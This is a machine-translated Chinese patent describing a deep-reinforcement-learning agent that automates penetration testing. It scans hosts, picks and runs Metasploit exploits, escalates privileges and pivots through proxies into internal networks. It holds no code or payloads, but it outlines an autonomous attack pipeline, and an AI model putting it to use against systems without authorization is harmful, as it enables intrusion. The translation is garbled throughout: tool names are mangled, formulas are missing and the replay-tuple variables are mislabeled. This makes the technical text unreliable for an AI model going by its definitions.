CN117235742A

CN117235742A - Intelligent penetration test method and system based on deep reinforcement learning

Info

Publication number: CN117235742A
Application number: CN202311504014.2A
Authority: CN
Inventors: 刘京菊; 张悦; 周仕承; 侯冬冬; 王永杰; 钟晓峰; 任乾坤
Original assignee: National University of Defense Technology
Current assignee: National University of Defense Technology
Priority date: 2023-11-13
Filing date: 2023-11-13
Publication date: 2023-12-15
Anticipated expiration: 2043-11-13
Also published as: CN117235742B

Abstract

The invention provides an intelligent penetration test method and system based on deep reinforcement learning, and belongs to the technical field of penetration test. According to the invention, state space characterization is performed based on a text embedding technology, penetration test action decision is performed based on deep reinforcement learning, automatic load calling is performed based on a metaploit database, learning training can be realized in a diversified target plane environment, and decision capability evolution can be realized by an intelligent agent in an iterative training process.

Description

Intelligent penetration test method and system based on deep reinforcement learning

Technical Field

The invention belongs to the technical field of penetration testing, and particularly relates to an intelligent penetration testing method and system based on deep reinforcement learning.

Background

Reinforcement learning is a general framework for solving the sequential decision problem, and based on a Markov Decision Process (MDP) model as a mathematical basis, the optimal strategy can be learned in a trial-and-error manner in continuous interaction with the environment.

The deep reinforcement learning is the combination of the deep learning and the reinforcement learning, reserves the perceptibility of the deep learning to the high-dimensional characteristic data and the decision capability of the reinforcement learning, and can be used for solving the complex decision problem in the real environment.

Currently, deep reinforcement learning has good application in the fields of autopilot, robotics control, stock trading and video gaming.

The penetration test is an authorized active network security assessment means, is different from the traditional defense modes such as intrusion detection, firewall technology and the like, aims to discover potential vulnerabilities of a target network system from the view of an attacker, and can more comprehensively assess potential threats.

The existing intelligent penetration test platform aims at training an intelligent agent to find an optimal penetration test path in a specific network environment, an attack graph and a deep reinforcement learning algorithm are combined by an intelligent penetration test system represented by AutoPenest, the training process depends on priori knowledge of a target network environment, the process of constructing the attack graph is complex, and the application of the attack graph in a real network environment is difficult.

Deep explicit is a deep reinforcement learning-based penetration test system, the bottom layer uses metajoin to make tool call, reinforcement learning technology is used to improve penetration test efficiency, but definition of state space is defective, and a trained model is difficult to apply to other targets.

Disclosure of Invention

Aiming at the defects in the prior art, the invention provides an intelligent penetration test scheme based on deep reinforcement learning.

The first aspect of the invention provides an intelligent penetration test method based on deep reinforcement learning, which comprises the following steps: step S1, acquiring a state vector of a target host, and inputting the state vector to a deep reinforcement learning decision-making device, wherein the deep reinforcement learning decision-making device determines executable actions aiming at the target host according to action execution strategies; step S2, executing the determined executable action on the target host by adopting a tool load corresponding to the determined executable action so as to acquire a feedback result and a reward signal of the target host after executing the determined executable action; step S3, inputting the feedback result to a noise reduction self-encoder TADAE to update the state vector of the target host, and inputting the reward signal to the deep reinforcement learning decision maker to update the action execution strategy.

Wherein the executable actions include: a first action for determining open port information of the target host; a second action, which is used for testing the loopholes existing in the target host and acquiring the first authority of the target host; and a third action for further acquiring a second right of the target host in the case where the first right has been acquired; wherein the second right is higher than the first right.

The method according to the first aspect of the invention, the method further comprising: and S0, carrying out survivability detection on each host in the target network based on the ICMP protocol and the ARP protocol, and selecting the target host from a plurality of hosts passing through the survivability detection in a breadth-first search mode.

The step S0 specifically includes: acquiring the address of the target network, sending a survivability detection message to the address of the target network based on an ICMP protocol and an ARP protocol, and receiving a response message of the survivability detection to determine a plurality of hosts passing through the survivability detection; adding a plurality of hosts detected by the survivability into a target host queue to be tested, and selecting a target IP from the target host queue to be tested in a mode of breadth-first search; initializing a state vector of a host corresponding to the target IP, judging whether the number of times that the host corresponding to the target IP has executed actions exceeds a threshold value, and if not, taking the host corresponding to the target IP as the target host.

According to the method of the first aspect of the invention, in said step S1: the acquired state vector of the target host is a one-dimensional vector and comprises an access control state, an open port list, a running service list, operating system information, page fingerprint information and historical execution actions of the target host; the action execution strategy adopts a reinforcement learning algorithm under a discrete action space, the neural network of the deep reinforcement learning decision-making device determines the selection probability of each executable action in the action space relative to the state vector of the target host, and the executable action with the maximum selection probability is taken as the executable action of the target host.

According to the method of the first aspect of the present invention, in said step S2, said tool load corresponding to said determined executable action is selected from a metaprofile database, said determined executable action being performed on said target host; the method specifically comprises the following steps: when the first action is executed, automatically detecting an open port, running service, an operating system and page fingerprints of the target host by utilizing Nmap and whatweb; the feedback information acquired after the first action is executed is as follows: the open port information of the target host and the potential vulnerability of the target host further determined based on the open port information of the target host; searching a vulnerability test script corresponding to the second action from a Metasplot database and executing the vulnerability test script when the second action is executed; the feedback information acquired after the second action is executed is: the method comprises the steps of determining the loopholes of a target host from a loophole test result and determining the first rights of the target host which are further acquired after the loopholes exist; searching a penetration test script corresponding to the third action from a metaplus database and executing the penetration test script when executing the third action; the feedback information acquired after the third action is executed is: and determining the penetration condition of the target host from the penetration test result, and further acquiring the second authority of the target host.

According to the method of the first aspect of the present invention, in the step S2, the bonus signal is calculated by: for the case of performing the first action, the reward signal r1= -Cost (a), cost (a) representing the Cost of performing the first action; for the case of executing the second action, the reward signal r2=value (h 1) -Cost (b), where Value (h 1) represents the forward Value after the first right is acquired, and Cost (b) represents the Cost of executing the second action; for the case of executing the third action, the reward signal r3=value (h 2) -Cost (c), where Value (h 2) represents the forward Value after the second right is acquired, and Cost (c) represents the Cost of executing the third action; will award vectorAnd storing the current state vector into an experience playback pool, wherein s is the current state vector, a is the next state vector, r is the current execution action, and s' is the reward signal.

According to the method of the first aspect of the present invention, in the step S3, the noise-reducing self-encoder TADAE includes an encoder, a pooling layer and a decoder, and the feedback result is obtained by the noise-reducing self-encoder TADAE to obtain a dense vector with a fixed length, so as to update the state vector of the target host; the objective function in the process of training the noise reduction self-encoder TADAE is as follows:

Wherein D is the data set of the training sentence, x is a word segmentation set after word segmentation of the sentence,for being by word->The word vector is composed, N is the word stock size,/->For the hidden state of the t-th step in the decoding process, l represents the total number of steps.

According to the method of the first aspect of the present invention, in the step S3, the deep reinforcement learning decision maker is trained by using a near-end policy optimization algorithm PPO, and when updating the action execution policy: the near-end policy optimization algorithm PPO samples the bonus vector from the experience playback poolCalculating policy update amplitude ∈ ->，Representing the status +_under updated policy>Take action->Probability of->Representing the status +_under the non-updated policy>Take action->Probability of (2);

the loss function of the actor network of the near-end policy optimization algorithm PPO is as follows:

wherein the dominance function，/>Representing that the policy is in state based on non-update +.>Take action down->Value of->Representing that the policy is in state based on non-update +.>The average value of the actions taken below, clip is a clipping function, < >>Is a super parameter and is used for controlling the action degree of the clipping function, and E represents an expected function;

the loss function of the critic network of the near-end policy optimization algorithm PPO is as follows:

Wherein,，/>representing status->Is (are) expected to return, is (are) added>Representing status->Is a true return of (c).

The second aspect of the invention provides an intelligent penetration test system based on deep reinforcement learning. The system comprises: a first processing unit configured to: acquiring a state vector of a target host, and inputting the state vector to a deep reinforcement learning decision-maker, wherein the deep reinforcement learning decision-maker determines executable actions aiming at the target host according to action execution strategies; a second processing unit configured to: executing the determined executable action on the target host with a tool load corresponding to the determined executable action to obtain a feedback result and a reward signal of the target host after executing the determined executable action; a third processing unit configured to: the feedback result is input to a noise reduction self-encoder TADAE to update the state vector of the target host, and the reward signal is input to the deep reinforcement learning decision maker to update the action execution strategy.

The system according to the second aspect of the present invention further comprises a preprocessing unit configured to: each host in the target network is subjected to viability detection based on ICMP protocol and ARP protocol, and the target host is selected from a plurality of hosts passing through the viability detection in a breadth-first search mode.

Wherein the preprocessing unit is specifically configured to: acquiring the address of the target network, sending a survivability detection message to the address of the target network based on an ICMP protocol and an ARP protocol, and receiving a response message of the survivability detection to determine a plurality of hosts passing through the survivability detection; adding a plurality of hosts detected by the survivability into a target host queue to be tested, and selecting a target IP from the target host queue to be tested in a mode of breadth-first search; initializing a state vector of a host corresponding to the target IP, judging whether the number of times that the host corresponding to the target IP has executed actions exceeds a threshold value, and if not, taking the host corresponding to the target IP as the target host.

According to the system of the second aspect of the present invention, the acquired state vector of the target host is a one-dimensional vector, and includes an access control state, an open port list, a running service list, operating system information, page fingerprint information and a history execution action of the target host; the action execution strategy adopts a reinforcement learning algorithm under a discrete action space, the neural network of the deep reinforcement learning decision-making device determines the selection probability of each executable action in the action space relative to the state vector of the target host, and the executable action with the maximum selection probability is taken as the executable action of the target host.

According to the system of the second aspect of the present invention, the second processing unit is specifically configured to: selecting the tool load from a metaprofile database corresponding to the determined executable action, the determined executable action being performed on the target host; the method specifically comprises the following steps: when the first action is executed, automatically detecting an open port, running service, an operating system and page fingerprints of the target host by utilizing Nmap and whatweb; the feedback information acquired after the first action is executed is as follows: the open port information of the target host and the potential vulnerability of the target host further determined based on the open port information of the target host; searching a vulnerability test script corresponding to the second action from a Metasplot database and executing the vulnerability test script when the second action is executed; the feedback information acquired after the second action is executed is: the method comprises the steps of determining the loopholes of a target host from a loophole test result and determining the first rights of the target host which are further acquired after the loopholes exist; searching a penetration test script corresponding to the third action from a metaplus database and executing the penetration test script when executing the third action; the feedback information acquired after the third action is executed is: and determining the penetration condition of the target host from the penetration test result, and further acquiring the second authority of the target host.

The system according to the second aspect of the present invention, the secondThe processing unit is specifically configured to calculate the reward signal in the following manner: for the case of performing the first action, the reward signal r1= -Cost (a), cost (a) representing the Cost of performing the first action; for the case of executing the second action, the reward signal r2=value (h 1) -Cost (b), where Value (h 1) represents the forward Value after the first right is acquired, and Cost (b) represents the Cost of executing the second action; for the case of executing the third action, the reward signal r3=value (h 2) -Cost (c), where Value (h 2) represents the forward Value after the second right is acquired, and Cost (c) represents the Cost of executing the third action; will award vectorAnd storing the current state vector into an experience playback pool, wherein s is the current state vector, a is the next state vector, r is the current execution action, and s' is the reward signal.

According to the system of the second aspect of the present invention, the third processing unit is specifically configured to make the noise reduction self-encoder TADAE include an encoder, a pooling layer and a decoder, and the feedback result obtains a dense vector with a fixed length after passing through the noise reduction self-encoder TADAE so as to update the state vector of the target host; the objective function in the process of training the noise reduction self-encoder TADAE is as follows:

According to the system of the second aspect of the present invention, the second processing unit is specifically configured to train the deep reinforcement learning decision maker with a near-end policy optimization algorithm PPO, when updating the action execution policy: the near-end policy optimization algorithm PPO samples the bonus vector from the experience playback poolCalculating policy update amplitude，/>Representing the status +_under updated policy>Take action->Is a function of the probability of (1),representing the status +_under the non-updated policy>Take action->Probability of (2);

A third aspect of the invention discloses an electronic device. The electronic device includes a memory and a processor, the memory storing a computer program, the processor implementing the steps in the intelligent penetration test method based on deep reinforcement learning according to the first aspect of the disclosure when executing the computer program.

A fourth aspect of the invention discloses a computer-readable storage medium. The computer readable storage medium stores a computer program which, when executed by a processor, implements the steps in an intelligent penetration test method based on deep reinforcement learning according to the first aspect of the present disclosure.

In summary, the technical scheme provided by the invention is used for carrying out state space characterization based on a text embedding technology, carrying out penetration test action decision based on deep reinforcement learning, carrying out automatic load calling based on a metaploit database, realizing learning training in diversified target aircraft environments, and realizing decision capability evolution in an iterative training process by an intelligent body.

Drawings

In order to more clearly illustrate the embodiments of the invention or the technical solutions in the prior art, the drawings which are required in the description of the embodiments or the prior art will be briefly described, it being obvious that the drawings in the description below are some embodiments of the invention and that other drawings may be obtained from these drawings without inventive effort for a person skilled in the art.

FIG. 1 is a diagram of the architecture composition of a deep reinforcement learning based intelligent penetration test according to an embodiment of the present invention.

FIG. 2 is a flow chart of a method for intelligent penetration testing based on deep reinforcement learning according to an embodiment of the present invention.

Fig. 3 is a block diagram of a noise reduction self-encoder TADAE according to an embodiment of the present invention.

Fig. 4 is a block diagram of an electronic device according to an embodiment of the present invention.

Detailed Description

For the purpose of making the objects, technical solutions and advantages of the embodiments of the present invention more apparent, the technical solutions of the embodiments of the present invention will be clearly and completely described below with reference to the accompanying drawings in the embodiments of the present invention, and it is apparent that the described embodiments are only some embodiments of the present invention, not all embodiments of the present invention. All other embodiments, which can be made by those skilled in the art based on the embodiments of the invention without making any inventive effort, are intended to be within the scope of the invention.

The first aspect of the invention provides an intelligent penetration test method based on deep reinforcement learning. The method comprises the following steps: step S1, acquiring a state vector of a target host, and inputting the state vector to a deep reinforcement learning decision-making device, wherein the deep reinforcement learning decision-making device determines executable actions aiming at the target host according to action execution strategies; step S2, executing the determined executable action on the target host by adopting a tool load corresponding to the determined executable action so as to acquire a feedback result and a reward signal of the target host after executing the determined executable action; step S3, inputting the feedback result to a noise reduction self-encoder TADAE to update the state vector of the target host, and inputting the reward signal to the deep reinforcement learning decision maker to update the action execution strategy.

In some embodiments, as shown in FIG. 1, a target selector, a state information encoder, a deep reinforcement learning decision maker, and an action library are included. The target selector selects a target to be tested according to the detection result of the target network environment. The decision maker receives the state vector of the target environment, selects and outputs executable actions on the target from the action library, the output actions are executed on the target to be tested, a feedback result of action execution and a reward signal are obtained, the feedback result is used for inputting the updated state vector of the encoder, and the reward signal is input into the decision maker for policy optimization.

In some embodiments, as shown in fig. 2, the operational flow includes: step 101: detecting the activity of a target network, and initializing a target queue to be tested; step 102: judging whether the queue is empty or not; step 103: the target selector selects a target host and initializes a state space; step 104: judging whether the maximum interaction times are reached; step 105: deciding a next action based on a deep reinforcement learning algorithm; step 106: selecting a tool load to execute an action based on the metaprofile database; step 107: obtaining action execution result feedback and a reward signal; step 108: updating the target host state space; step 109: judging whether to acquire the authority of the target host; step 110: the deep reinforcement learning decision-maker performs strategy updating; step 111: and (3) the intranet node discovery and proxy construction are carried out, and the target queue to be tested is updated.

Step 101: and detecting the activity of the target network, and initializing a target queue to be tested.

In some embodiments, the system initializes a target host queue to be tested in an initial state, performs network surviving host detection based on ICMP protocol and ARP protocol according to the input target network address, and stores the detected surviving host IP address into the target queue to be tested.

Step 102: and judging whether the queue is empty or not.

In some embodiments, it is determined whether the current target queue to be tested is empty, if so, the system ends operation, otherwise, step 103 is entered.

Step 103: the target selector selects a target host and initializes the state space.

In some embodiments, the destination selector selects a destination IP based on a breadth-first search based on the current destination queue to be tested, while deleting the destination in the queue. Initializing a state space of the target, wherein the state space comprises an access control state of a target host, an open port list, a running service list, operating system information, web fingerprint information, an action list executed on the target and the like. The state space is initialized to a one-dimensional vector with a value of 0 and a fixed length, and the list of actions performed on the target is initialized to null.

Step 104: and judging whether the maximum interaction times are reached.

In some embodiments, it is determined whether the number of actions currently performed on the target reaches a maximum number based on a set threshold. If the maximum number of times has been reached, step 102 is entered, otherwise step 105 is entered.

Step 105: the next action is decided based on the deep reinforcement learning algorithm.

In some embodiments, the state vector input depth reinforcement learning decision maker of the state space encoded state space of the target host outputs the next executable action. The system adopts reinforcement learning algorithm under discrete action space to make decision, the neural network outputs the selection probability corresponding to each action in the action space, and the action with the maximum selection probability is output.

Step 106: selecting a tool load to perform an action based on the metaprofile database.

In some embodiments, the step selects a corresponding tool load to execute according to the executable action output by the decision maker, and the action space of the system comprises an information scanning class, a vulnerability testing class and a permission maintenance class. For the information scanning class, the system calls tools such as Nmap, whatweb and the like to automatically detect the open port, running service, operating system and web fingerprint of the target host. Aiming at the vulnerability test and authority maintenance class, the system searches the corresponding vulnerability test script or the post-penetration test script from the Metasplot database according to the decision result of the decision maker and executes the vulnerability test script to acquire the control authority of the target host. The system builds a load parameter configuration database, and calls the setting parameters and execution of the msfrpcd interface in an automatic flow arrangement mode.

Step 107: and obtaining action execution result feedback and a reward signal.

In some embodiments, the end of the execution of the action may obtain a feedback result, where the feedback result exists in the form of text, for example, performing the port scan action may obtain port information of the target opening, performing the vulnerability test action may obtain whether the test is successful, the obtained control session number, and so on. Meanwhile, the system calculates a reward signal according to the execution result, wherein the reward signal is a measure of the quality of the current action selection result, is the balance between the value of the target host and the cost of taking action, and adopts a formulaCalculation of>Represents the forward value obtained after obtaining the rights of host h,representing execution of an action->At the cost of (2). Feedback of the result of action execution for updating the target state vector at step 108, the system updates the current state vector, the next state vector after action execution, the current execution action, and the reward signal +.>The experience playback pool is logged for policy updates.

Step 108: updating the target host state space.

In some embodiments, the system updates the current state vector based on feedback information of the action execution result. The system adopts an embedded (empedding) model of a TSDAE training state space of a noise reduction self-encoder based on a transducer structure, and inputs original text information fed back by actions into the TSDAE to output dense vectors with fixed lengths. The system collects an internet-based network security corpus, data come from an NVD database, a Metasplot database and various security forums, the data are input into a TSDAE in the form of sentences, and an embedded model is trained in an unsupervised learning mode. The TSDAE structure is shown in fig. 3, and the text added with noise is accepted and encoded into sentence vectors with fixed length, the sentence vectors are reconstructed into original input by a decoder, and an objective function in the training process is defined as follows:

Step 109: and judging whether to acquire the target host permission.

In some embodiments, it is determined whether to acquire the target host permission according to the execution result of the action, if permission is acquired, step 111 is entered, otherwise step 110 is entered.

Step 110: the deep reinforcement learning decision maker performs policy updating.

In some embodiments, the system employs a near-end policy optimization algorithm (PPO) training decision maker, the PPO is a deep reinforcement learning algorithm based on actor commentary framework (actor-critic), the actor network outputs an action according to the current policy, and the critic network evaluates the policy according to the current state and the output actionGood or bad. During the policy update phase, the algorithm samples a batch of samples from the experience playback poolData, where s is a state vector, +.>For an action performed in s-state s' is taking action in s-state +.>The next state after that, r is the execution action +.>The awards obtained. PPO adopts the calculation importance weight +. >The update amplitude of the new strategy compared with the old strategy is constrained, and the loss function of the actor network update is as follows:

wherein,representing policy update amplitude, i.e. for status +.>Action is taken under the current policy->Probability of (2) and taking action under the old policy +.>The ratio of probabilities of (2); />As a dominance function, the effect is to measure the quality of the current state and action relative to the average level, and represent the value and average price of the current state and actionThe difference in the values is used to determine,representing action taken in the current state->Value of->Representing the average value in the current state; the clip function is a clipping function, +.>Is a super parameter for controlling the action degree of the clipping function. The loss function of Critic networks is:

wherein,desired return indicative of current state->Representing status->Is (are) expected to return, is (are) added>Representing status->Is a true return of (c).

Step 111: and (3) the intranet node discovery and proxy construction are carried out, and the target queue to be tested is updated.

In some embodiments, after obtaining the authority of the target host, the system performs intranet node discovery on the controlled host, scans and discovers intranet surviving nodes connected with the host in an arp scanning and local information reading mode, builds a proxy link to forward traffic, and adds newly discovered intranet surviving nodes into the target queue to be tested.

In summary, the method trains a text embedding model based on TSDAE, and can directly encode environmental state information into a state vector in a text form to be input into a deep reinforcement learning decision-making device. The embedded model trained by the application can represent semantic information among state information, so that a decision maker can decide similar actions according to similar inputs, policy migration under multiple scenes and training under a real network scene can be realized, and the problem that the model learned and trained under a simulation environment is difficult to apply to the real network scene is effectively solved.

The second aspect of the application provides an intelligent penetration test system based on deep reinforcement learning. The system comprises: a first processing unit configured to: acquiring a state vector of a target host, and inputting the state vector to a deep reinforcement learning decision-maker, wherein the deep reinforcement learning decision-maker determines executable actions aiming at the target host according to action execution strategies; a second processing unit configured to: executing the determined executable action on the target host with a tool load corresponding to the determined executable action to obtain a feedback result and a reward signal of the target host after executing the determined executable action; a third processing unit configured to: the feedback result is input to a noise reduction self-encoder TADAE to update the state vector of the target host, and the reward signal is input to the deep reinforcement learning decision maker to update the action execution strategy.

According to the system of the second aspect of the present invention, the second processing unit is specifically configured to calculate the reward signal in a manner that: for the case of performing the first action, the reward signal r1= -Cost (a), cost (a) representing the Cost of performing the first action; for the case of executing the second action, the reward signal r2=value (h 1) -Cost (b), where Value (h 1) represents the forward Value after the first right is acquired, and Cost (b) represents the Cost of executing the second action; for the case of executing the third action, the reward signal r3=value (h 2) -Cost (c), where Value (h 2) represents the forward Value after the second right is acquired, and Cost (c) represents the Cost of executing the third action; will award vectorAnd storing the current state vector into an experience playback pool, wherein s is the current state vector, a is the next state vector, r is the current execution action, and s' is the reward signal.

Fig. 4 is a block diagram of an electronic device according to an embodiment of the present invention, and as shown in fig. 4, the electronic device includes a processor, a memory, a communication interface, a display screen, and an input device connected through a system bus. Wherein the processor of the electronic device is configured to provide computing and control capabilities. The memory of the electronic device includes a nonvolatile storage medium and an internal memory. The non-volatile storage medium stores an operating system and a computer program. The internal memory provides an environment for the operation of the operating system and computer programs in the non-volatile storage media. The communication interface of the electronic device is used for conducting wired or wireless communication with an external terminal, and the wireless communication can be achieved through WIFI, an operator network, near Field Communication (NFC) or other technologies. The display screen of the electronic equipment can be a liquid crystal display screen or an electronic ink display screen, and the input device of the electronic equipment can be a touch layer covered on the display screen, can also be keys, a track ball or a touch pad arranged on the shell of the electronic equipment, and can also be an external keyboard, a touch pad or a mouse and the like.

It will be appreciated by those skilled in the art that the structure shown in fig. 4 is merely a block diagram of a portion related to the technical solution of the present disclosure, and does not constitute a limitation of the electronic device to which the technical solution of the present disclosure is applied, and a specific electronic device may include more or less components than those shown in the drawings, or may combine some components, or have different component arrangements.

A fourth aspect of the application discloses a computer-readable storage medium. The computer readable storage medium stores a computer program which, when executed by a processor, implements the steps in an intelligent penetration test method based on deep reinforcement learning according to the first aspect of the present disclosure.

In summary, the technical scheme provided by the application is used for carrying out state space characterization based on a text embedding technology, carrying out penetration test action decision based on deep reinforcement learning, carrying out automatic load calling based on a metaploit database, realizing learning training in diversified target aircraft environments, and realizing decision capability evolution in an iterative training process by an intelligent body.

Note that the technical features of the above embodiments may be arbitrarily combined, and all possible combinations of the technical features in the above embodiments are not described for brevity of description, however, as long as there is no contradiction between the combinations of the technical features, they should be regarded as the scope of the description. The above examples illustrate only a few embodiments of the application, which are described in detail and are not to be construed as limiting the scope of the application. It should be noted that it will be apparent to those skilled in the art that several variations and modifications can be made without departing from the spirit of the application, which are all within the scope of the application. Accordingly, the scope of protection of the present application is to be determined by the appended claims.

Claims

1. An intelligent penetration test method based on deep reinforcement learning, which is characterized by comprising the following steps:

step S1, acquiring a state vector of a target host, and inputting the state vector to a deep reinforcement learning decision-making device, wherein the deep reinforcement learning decision-making device determines executable actions aiming at the target host according to action execution strategies;

step S2, executing the determined executable action on the target host by adopting a tool load corresponding to the determined executable action so as to acquire a feedback result and a reward signal of the target host after executing the determined executable action;

step S3, inputting the feedback result to a noise reduction self-encoder TADAE to update the state vector of the target host, and inputting the reward signal to the deep reinforcement learning decision maker to update the action execution strategy;

wherein the executable actions include:

a first action for determining open port information of the target host;

a second action, which is used for testing the loopholes existing in the target host and acquiring the first authority of the target host; and

a third action for further acquiring a second right of the target host in the case where the first right has been acquired;

Wherein the second right is higher than the first right.

2. The method for intelligent penetration testing based on deep reinforcement learning of claim 1, further comprising:

step S0, carrying out survivability detection on each host in a target network based on an ICMP protocol and an ARP protocol, and selecting the target host from a plurality of hosts passing through the survivability detection in a breadth-first search mode;

the step S0 specifically includes:

acquiring the address of the target network, sending a survivability detection message to the address of the target network based on an ICMP protocol and an ARP protocol, and receiving a response message of the survivability detection to determine a plurality of hosts passing through the survivability detection;

adding a plurality of hosts detected by the survivability into a target host queue to be tested, and selecting a target IP from the target host queue to be tested in a mode of breadth-first search;

initializing a state vector of a host corresponding to the target IP, judging whether the number of times that the host corresponding to the target IP has executed actions exceeds a threshold value, and if not, taking the host corresponding to the target IP as the target host.

3. The intelligent penetration test method based on deep reinforcement learning according to claim 2, wherein in the step S1:

the acquired state vector of the target host is a one-dimensional vector and comprises an access control state, an open port list, a running service list, operating system information, page fingerprint information and historical execution actions of the target host;

the action execution strategy adopts a reinforcement learning algorithm under a discrete action space, the neural network of the deep reinforcement learning decision-making device determines the selection probability of each executable action in the action space relative to the state vector of the target host, and the executable action with the maximum selection probability is taken as the executable action of the target host.

4. A method of intelligent penetration testing based on deep reinforcement learning according to claim 3, wherein in said step S2, said tool load corresponding to said determined executable action is selected from a metaprofile database, said determined executable action being performed on said target host; the method specifically comprises the following steps:

when the first action is executed, automatically detecting an open port, running service, an operating system and page fingerprints of the target host by utilizing Nmap and whatweb;

The feedback information acquired after the first action is executed is as follows: the open port information of the target host and the potential vulnerability of the target host further determined based on the open port information of the target host;

searching a vulnerability test script corresponding to the second action from a Metasplot database and executing the vulnerability test script when the second action is executed;

the feedback information acquired after the second action is executed is: the method comprises the steps of determining the loopholes of a target host from a loophole test result and determining the first rights of the target host which are further acquired after the loopholes exist;

searching a penetration test script corresponding to the third action from a metaplus database and executing the penetration test script when executing the third action;

the feedback information acquired after the third action is executed is: and determining the penetration condition of the target host from the penetration test result, and further acquiring the second authority of the target host.

5. The intelligent penetration test method based on deep reinforcement learning according to claim 4, wherein in the step S2, the reward signal is calculated by:

For the case of performing the first action, the reward signal r1= -Cost (a), cost (a) representing the Cost of performing the first action;

for the case of executing the second action, the reward signal r2=value (h 1) -Cost (b), where Value (h 1) represents the forward Value after the first right is acquired, and Cost (b) represents the Cost of executing the second action;

for the case of executing the third action, the reward signal r3=value (h 2) -Cost (c), where Value (h 2) represents the forward Value after the second right is acquired, and Cost (c) represents the Cost of executing the third action;

will award vectorIs stored in an experience playback pool, s isThe current state vector, a is the next state vector, r is the current execution action, and s' is the reward signal.

6. The intelligent penetration test method based on deep reinforcement learning according to claim 5, wherein in the step S3, the noise-reducing self-encoder TADAE includes an encoder, a pooling layer and a decoder, and the feedback result is obtained by the noise-reducing self-encoder TADAE to obtain a dense vector with a fixed length so as to update the state vector of the target host; the objective function in the process of training the noise reduction self-encoder TADAE is as follows:

，

7. The intelligent penetration test method based on deep reinforcement learning according to claim 6, wherein in the step S3, the deep reinforcement learning decision maker is trained by using a near-end policy optimization algorithm PPO, and when updating the action execution policy:

the near-end policy optimization algorithm PPO samples the bonus vector from the experience playback poolCalculating policy update amplitude ∈ ->，/>Representing the status +_under updated policy>Take action->Probability of->Representing the status +_under the non-updated policy>Take action->Probability of (2);

，

wherein the dominance function，/>Representing that a policy is in state based on an updateTake action down->Value of->Representing that the policy is in state based on non-update +.>The average value of the actions taken below, clip is a clipping function, < >>Is a super parameter and is used for controlling the action degree of the clipping function, and E represents an expected function;

，

8. An intelligent penetration testing system based on deep reinforcement learning, the system comprising:

a first processing unit configured to: acquiring a state vector of a target host, and inputting the state vector to a deep reinforcement learning decision-maker, wherein the deep reinforcement learning decision-maker determines executable actions aiming at the target host according to action execution strategies;

a second processing unit configured to: executing the determined executable action on the target host with a tool load corresponding to the determined executable action to obtain a feedback result and a reward signal of the target host after executing the determined executable action;

a third processing unit configured to: inputting the feedback result to a noise reduction self-encoder TADAE to update a state vector of the target host, and inputting the reward signal to the deep reinforcement learning decision maker to update the action execution strategy;

wherein the executable actions include:

A first action for determining open port information of the target host;

wherein the second right is higher than the first right.

9. An electronic device comprising a memory and a processor, the memory storing a computer program, the processor implementing the steps of any one of claims 1-7 in a deep reinforcement learning based intelligent penetration test method when executing the computer program.

10. A computer readable storage medium, wherein a computer program is stored on the computer readable storage medium, which when executed by a processor, implements the steps of a deep reinforcement learning based intelligent penetration test method according to any of claims 1-7.